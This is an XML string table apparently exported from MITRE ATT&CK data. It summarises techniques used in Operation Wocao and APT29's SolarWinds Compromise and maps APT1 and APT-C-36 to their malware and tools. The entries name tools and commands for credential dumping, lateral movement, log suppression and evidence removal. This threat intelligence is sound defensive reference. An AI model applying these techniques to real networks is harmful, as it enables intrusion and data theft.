    <t>relationship--64c3c385-6e1f-438f-ba7e-ac7d79375ada</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors scanned for open ports and used nbtscan to find NETBIOS nameservers.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--c4693c3d-7ec1-4e6d-9788-b3aa39d97e10</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors discovered network disks mounted to the system using [netstat](https://attack.mitre.org/software/S0104).(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--7d7e63bb-1b78-459d-a300-d21bb270ad7d</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a custom protocol for command and control.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--cbf2f9fe-e61b-4a04-a135-d1f6c4ec6cc3</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors used uncommon high ports for its backdoor C2, including ports 25667 and 47000.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--30f0fc1f-d2fb-4bc8-98b1-431324127f07</t>
  </si>
  <si>
    <t>07 January 2023</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors accessed and collected credentials from password managers.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--13e7416a-7a02-438f-a708-598f132ea394</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors discovered removable disks attached to a system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--b3f7d095-c7eb-4a4b-909d-e3b831c7ed16</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used PowerShell on compromised systems.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--c2745621-0b03-4b9d-b2f7-4e3b80487f87</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Mimikatz](https://attack.mitre.org/software/S0002) to dump certificates and private keys from the Windows certificate store.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--1d2ee595-1972-46ac-bd85-322bdc5e35de</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors used `tasklist` to collect a list of running processes on an infected system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--fe7c5c1c-b5b2-4770-911c-415839d5ede4</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors injected code into a selected process, which in turn launches a command as a child process of the original.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--95d0ca69-0e05-4f68-ba95-99094f01e140</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a custom proxy tool called "Agent" which has support for multiple hops.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--9df6635a-b3ed-494c-845e-b743e494861c</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors' backdoors were written in Python and compiled with py2exe.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--971d6207-8f0f-4771-8f7e-a6aa9aadda1c</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</si>
  <si>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</si>
  <si>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relationship--0032f447-1ab7-427d-b7ae-baa436dc2411</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used `nbtscan` and `ping` to discover remote systems, as well as `dsquery subnet` on a domain controller to retrieve all subnets in the Active Directory.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--0d7506cd-4869-48f9-a0e0-cb70d6b482ff</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Impacket](https://attack.mitre.org/software/S0357)'s smbexec.py as well as accessing the C$ and IPC$ shares to move laterally.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--82e1cb6f-7528-430f-8e8e-fc3213f25402</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used scheduled tasks to execute malicious PowerShell code on remote systems.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--b7c3b6c4-9f4b-4e11-92df-a4bb6e82a66a</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used scripts to detect security software.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--07b15826-1fe3-42db-afdb-9f18e2c8ef2b</t>
  </si>
  <si>
    <t>For [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors purchased servers with Bitcoin to use during the operation.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--576cbf79-037c-4265-af56-cd0d7a57c1b9</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors created services on remote systems for execution purposes.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--4d7faa7b-2fd2-4c40-89c2-e8171055733c</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors collected a list of installed software on the infected system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--e848e92c-af22-4284-a27d-7c2673a4b0fe</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</si>
  <si>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</si>
  <si>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relationship--bc52cbe2-32a0-4491-aa57-46ef39e431b9</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors discovered the local network configuration with `ipconfig`.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--dfc90c30-4cc7-4f5f-8315-6a20c14696d9</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors collected a list of open connections on the infected system using `netstat` and checks whether it has an internet connection.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--26aac288-6032-4925-afbe-506c8ea06300</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--41c81917-ca17-4d7f-abdd-dcd408ad230d</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the `tasklist` command to search for one of its backdoors.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--b3492594-4cb7-4c5c-a0b4-5054720e83fe</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the `time` command to retrieve the current time of a compromised system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--30ee835f-64a1-4e14-8c9c-648e24fc9b0b</t>
  </si>
  <si>
    <t>For [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors obtained a variety of open source tools, including JexBoss, KeeThief, and [BloodHound](https://attack.mitre.org/software/S0521).(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--8127487a-15fd-4802-8537-ddb2f72e72fd</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used valid VPN credentials to gain initial access.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--70879424-99b5-4ebe-8c77-cf872738dfcf</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used VBScript to conduct reconnaissance on targeted systems.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--86d110ea-060e-462f-a520-ad650564c05e</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors’ XServer tool communicated using HTTP and HTTPS.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--45df3c58-de91-4f36-a094-44e52b077f41</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used their own web shells, as well as those previously placed on target systems by other threat actors, for reconnaissance and lateral movement.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--e49ceb1e-8ab0-44c5-8232-2b9aa0cf17ad</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors spawned a new `cmd.exe` process to execute commands.(Citation: FoxIT Wocao December 2019) </t>
  </si>
  <si>
    <t>relationship--11ab0bc2-4baa-4d06-a001-2b59d3bc5567</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors has used WMI to execute commands.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--c380f574-0f88-4481-84c2-f429bd47c84d</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) obtained a list of users and their roles from an Exchange server using `Get-ManagementRoleAssignment`.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>relationship--ecdd1bee-29eb-4f72-a506-6c33777a094f</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</si>
  <si>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</si>
  <si>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relationship--cd4655ac-8e31-4272-a944-9bf54074d3a0</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) granted `company administrator` privileges to a newly created service principle.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--80e8fae3-0b15-4e5b-bd69-af76dd3e5864</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</si>
  <si>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</si>
  <si>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relationship--4b0b60ee-2ee8-4de0-868f-ae4c85e131ff</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used compromised service principals to make changes to the Office 365 environment.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--7b2cc5e3-11c3-4620-a787-04f2273bcbb8</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</si>
  <si>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</si>
  <si>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relationship--f5c854b7-6c1e-48bd-b8fd-c8fbebf4e326</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) removed evidence of email export requests using `Remove-MailboxExportRequest`.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>relationship--e30d2085-62df-4c4a-9828-a9b6d5396136</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used a compromised O365 administrator account to create a new Service Principal.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--00fe17bc-f783-4cba-9171-e1fde2fa0efa</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) downloaded source code from code repositories.(Citation: Microsoft Internal Solorigate Investigation Blog)</t>
  </si>
  <si>
    <t>relationship--93dc5023-3f2b-41a3-bd5a-68121a94280d</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</si>
  <si>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</si>
  <si>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relationship--84c18662-07de-4abc-99e2-f2bfb19cc5da</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</si>
  <si>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</si>
  <si>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relationship--dba2e83b-a79b-4d4e-8c32-70b7c8f2491f</t>
  </si>
  <si>
    <t>For the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) conducted credential theft operations to obtain credentials to be used for access to victim environments.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--68b21708-d862-42ba-8067-7fdca0bd1455</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</si>
  <si>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</si>
  <si>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relationship--d398f48c-9d01-4f6e-bb19-3ebae25cb71c</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) stole users' saved passwords from Chrome.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--2cac54a6-fe28-45b2-b4f7-53a23f8a5f54</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</si>
  <si>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</si>
  <si>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relationship--c34b776e-2fca-4ff9-910d-486bf9447d78</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</si>
  <si>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</si>
  <si>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relationship--5377ce7e-ae13-4902-a7f9-98e83d04808b</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) extracted files from compromised networks.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>relationship--73b90f6c-b64d-4b7b-8142-b02f52e8cea1</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used 7-Zip to decode their [Raindrop](https://attack.mitre.org/software/S0565) malware.(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>relationship--73622af3-6412-4fb9-b0ba-6a127c0db558</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) registered devices in order to enable mailbox syncing via the `Set-CASMailbox` command.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>relationship--a05709f5-d61c-40cf-8fdc-d821eafce194</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016), used `AUDITPOL` to prevent the collection of audit logs.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--c4252024-1997-4d07-8c48-e2b9d27d4e30</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used `netsh` to configure firewall rules that limited certain UDP outbound packets.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--fa66467a-e6d8-49ff-add1-8e5c5e4ef1db</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</si>
  <si>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</si>
  <si>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relationship--4e251295-c2c3-4bfa-85c6-6de01948cf9f</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</si>
  <si>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</si>
  <si>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relationship--09cc5150-b68e-45de-9172-5fec7623c9ac</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used domain administrators' accounts to help facilitate lateral movement on compromised networks.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--37213eca-1510-4893-b27a-f17a8dd16a78</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used [AdFind](https://attack.mitre.org/software/S0552) to enumerate domain groups.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--19baa7ba-5fdd-405e-996c-13e49299cbfb</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</si>
  <si>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</si>
  <si>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relationship--cf0b7d7d-0770-4b97-86ff-cbb5ec19bb83</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</si>
  <si>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</si>
  <si>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relationship--e43b9163-36cb-469a-9c47-9e4bd8af1383</t>
  </si>
  <si>
    <t>For the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) acquired C2 domains, sometimes through resellers.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>relationship--eab4fb13-01cc-4d7c-87a8-dc52e172dfab</t>
  </si>
  <si>
    <t>For the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) compromised domains to use for C2.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--2389113c-9a72-4633-aa52-8f77c3df564a</t>
  </si>
  <si>
    <t xml:space="preserve">During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.(Citation: Volexity SolarWinds) </t>
  </si>
  <si>
    <t>relationship--67cf9a5c-3ecf-4280-9808-a027680f7444</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>relationship--fc56bf57-2188-4177-b0a3-e89bb8478523</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</si>
  <si>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</si>
  <si>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relationship--9171c149-2e87-4882-9e9d-8abce7533beb</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</si>
  <si>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</si>
  <si>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relationship--a0c23dc4-d3ad-4312-a10c-001e7040a32b</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) routinely removed their tools, including custom backdoors, once remote access was achieved.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--9505cb0b-a9b6-4680-94ed-ae74916444f0</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) obtained information about the configured Exchange virtual directory using `Get-WebServicesVirtualDirectory`.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>relationship--755e4d65-4e9f-499c-93f3-2aa9a9404000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</si>
  <si>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</si>
  <si>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relationship--bbc492bf-de7c-4ef7-ba1b-565ec0f22379</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</si>
  <si>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</si>
  <si>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relationship--b5234d9f-a581-4bcd-9441-2c1d111f3ce8</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</si>
  <si>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</si>
  <si>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relationship--177d06e3-7e2f-47a1-8bbf-18a4787af5c7</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</si>
  <si>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</si>
  <si>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relationship--2a764532-6758-4a82-90e4-eb53d1ac9c16</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principle Names to crack offline.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--aa84d43a-4f79-485c-95ea-a375d5f52838</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used compromised local accounts to access victims' networks.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--bb886759-3494-4834-9765-2f0c12e0b391</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</si>
  <si>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</si>
  <si>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relationship--6ce6e5d1-a9e1-43bb-a296-e6bd188081f4</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) named tasks `\Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager` in order to appear legitimate.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>relationship--cb7005a8-0c69-4f5f-b14c-aae0c8e2cced</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</si>
  <si>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</si>
  <si>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relationship--d6b1b347-ca50-4a40-90d0-ddb81304518f</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) renamed software and DLLs with legitimate names to appear benign.(Citation: Volexity SolarWinds)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>relationship--378bf78e-6c5c-4466-9d6b-a494ae375526</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</si>
  <si>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</si>
  <si>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relationship--7657acc8-12ba-4e39-a739-011674d94f58</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</si>
  <si>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</si>
  <si>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relationship--949cf89d-6d65-4459-83e7-dc826ae9c894</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</si>
  <si>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</si>
  <si>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relationship--6934c7b5-96ce-4265-aea3-7eae018d7f3c</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</si>
  <si>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</si>
  <si>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relationship--1a1d72d9-3dd3-410d-99cc-ada6def874ff</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) staged data and files in password-protected archives on a victim's OWA server.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>relationship--9eb8df35-0cbf-490e-903a-f610a1387eb2</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used RDP sessions from public-facing systems to internal servers.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--4b6f2524-85b4-4151-9001-32b875cfbb19</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</si>
  <si>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</si>
  <si>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relationship--1980e913-a4dc-415c-a98d-df1a20e001f2</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used [AdFind](https://attack.mitre.org/software/S0552) to enumerate remote systems.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--7748c6c9-d7a5-44e9-81bf-97d038e6edb1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</si>
  <si>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</si>
  <si>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relationship--8cba1710-1963-4d83-99dd-88a1d6b2580f</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</si>
  <si>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</si>
  <si>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relationship--00e7784e-d0c8-48d8-a377-7ec83cf6a474</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used administrative accounts to connect over SMB to targeted users.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--57d595d2-4363-4816-826e-91e45dd364e5</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</si>
  <si>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</si>
  <si>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relationship--081a9ee3-3609-4bab-8956-d0bd2b77754a</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) stole Chrome browser cookies by copying the Chrome profile directories of targeted users.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--95add276-6a4d-4281-82e5-7857b615742b</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used `fsutil` to check available free space before executing actions that might create large files on disk.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--b16660dc-0675-462a-85fc-1902a751639e</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) modified timestamps of backdoors to match legitimate Windows files.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--a4a0c78e-6f15-4304-9e40-36c09a532a05</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</si>
  <si>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</si>
  <si>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relationship--a246ff9a-6414-461f-b392-ac37bc3716c0</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</si>
  <si>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</si>
  <si>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relationship--2a8a7397-8977-4554-abbf-5168074cd4cc</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</si>
  <si>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</si>
  <si>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relationship--f059a1ec-1945-43b7-ba0c-0d304c5b6d74</t>
  </si>
  <si>
    <t>For the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) wrote malware such as [Sibot](https://attack.mitre.org/software/S0589) in Visual Basic.(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>relationship--59fd7bfd-f99b-4a76-9ea0-4fc89c27f204</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>relationship--97ce46f9-4277-4700-99bb-b8bad6dfb393</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used HTTP for C2 and data exfiltration.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>relationship--fdd3d41d-beca-4b12-9330-8f26dd82367c</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</si>
  <si>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</si>
  <si>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relationship--9b03dca3-8d3f-42a6-9df1-44fdd732d393</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used `cmd.exe` to execute commands on remote machines.(Citation: Volexity SolarWinds)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>relationship--a4346806-c7aa-4fa4-896d-a279ceeaf487</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used WMI for the remote execution of files for lateral movement.(Citation: Microsoft 365 Defender Solorigate)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--da68887e-3811-4537-90b1-21d42a90e960</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</si>
  <si>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</si>
  <si>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relationship--8e8aced5-9391-47d8-bef7-894453048810</t>
  </si>
  <si>
    <t>During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used WinRM via PowerShell to execute commands and payloads on remote hosts.(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>relationship--7779c4b8-d007-439a-81b7-b56efb8742ea</t>
  </si>
  <si>
    <t>G0099</t>
  </si>
  <si>
    <t>APT-C-36</t>
  </si>
  <si>
    <t>intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842</t>
  </si>
  <si>
    <t>S0434</t>
  </si>
  <si>
    <t>Imminent Monitor</t>
  </si>
  <si>
    <t>tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9</t>
  </si>
  <si>
    <t>(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>relationship--3f010259-666c-403b-b5c7-603b319583da</t>
  </si>
  <si>
    <t>05 May 2020</t>
  </si>
  <si>
    <t>G0006</t>
  </si>
  <si>
    <t>APT1</t>
  </si>
  <si>
    <t>intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662</t>
  </si>
  <si>
    <t>S0017</t>
  </si>
  <si>
    <t>BISCUIT</t>
  </si>
  <si>
    <t>malware--b8eb28e4-48a6-40ae-951a-328714f75eda</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--19fce62c-ba70-4c20-bf74-0bca7886190c</t>
  </si>
  <si>
    <t>20 August 2019</t>
  </si>
  <si>
    <t>S0025</t>
  </si>
  <si>
    <t>CALENDAR</t>
  </si>
  <si>
    <t>malware--5a84dc36-df0d-4053-9b7c-f0c388a57283</t>
  </si>
  <si>
    <t>relationship--7909f5a6-3924-4259-aedd-2e48123f563a</t>
  </si>
  <si>
    <t>S0119</t>
  </si>
  <si>
    <t>Cachedump</t>
  </si>
  <si>
    <t>tool--c9cd7ec9-40b7-49db-80be-1399eddd9c52</t>
  </si>
  <si>
    <t>relationship--1d5e0da2-7741-4a31-9c54-cbbe584fe27b</t>
  </si>
  <si>
    <t>S0026</t>
  </si>
  <si>
    <t>GLOOXMAIL</t>
  </si>
  <si>
    <t>malware--f2e8c7a1-cae1-45c4-baf0-6f21bdcbb2c2</t>
  </si>
  <si>
    <t>relationship--324a5331-cce7-4154-a803-ad68d5de1f94</t>
  </si>
  <si>
    <t>S0121</t>
  </si>
  <si>
    <t>Lslsass</t>
  </si>
  <si>
    <t>tool--2fab555f-7664-4623-b4e0-1675ae38190b</t>
  </si>
  <si>
    <t>relationship--44858dc2-c869-42a0-8f67-3ddd9660b538</t>
  </si>
  <si>
    <t>relationship--630dedba-136b-4ea3-956e-f8f38e96653d</t>
  </si>
  <si>
    <t>relationship--b6f70ba6-bff1-4b40-a418-356e7b6efa27</t>
  </si>
  <si>
    <t>S0122</t>
  </si>
  <si>
    <t>Pass-The-Hash Toolkit</t>
  </si>
  <si>
    <t>tool--a52edc76-328d-4596-85e7-d56ef5a9eb69</t>
  </si>
  <si>
    <t>relationship--76393f0c-a13c-48a8-ba7d-80502ae938a7</t>
  </si>
  <si>
    <t>relationship--47545d87-b0ae-45ae-aeea-dc849eac2f6f</t>
  </si>
  <si>
    <t>relationship--2d0afb20-dfbd-4f6b-bd75-ee67d8eeb8c6</t>
  </si>
  <si>
    <t>30 January 2019</t>
  </si>
  <si>
    <t>S0345</t>
  </si>
  <si>
    <t>Seasalt</t>
  </si>
  <si>
    <t>malware--b45747dc-87ca-4597-a245-7e16a61bc491</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT1 Appendix)(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>relationship--0e6d6b87-84fe-49ed-9b85-cf3cdfa36820</t>
  </si>
  <si>
    <t>relationship--79cd2ec8-068c-4a7a-8133-1855381d3bd3</t>
  </si>
  <si>
    <t>S0109</t>
  </si>
  <si>
    <t>WEBC2</t>
  </si>
  <si>
    <t>malware--1d808f62-cf63-4063-9727-ff6132514c22</t>
  </si>
  <si>
    <t>relationship--4a687e50-e6b7-41df-93b1-6fed7db10f60</t>
  </si>
  <si>
    <t>relationship--6e366a30-cf75-4a47-855f-91a006014ada</t>
  </si>
  <si>
    <t>relationship--13984eec-6c33-4bab-a22c-5c061ddd6e44</t>
  </si>
  <si>
    <t>S0006</t>
  </si>
  <si>
    <t>pwdump</t>
  </si>
  <si>
    <t>tool--9de2308e-7bed-43a3-8e58-f194b3586700</t>
  </si>
  <si>
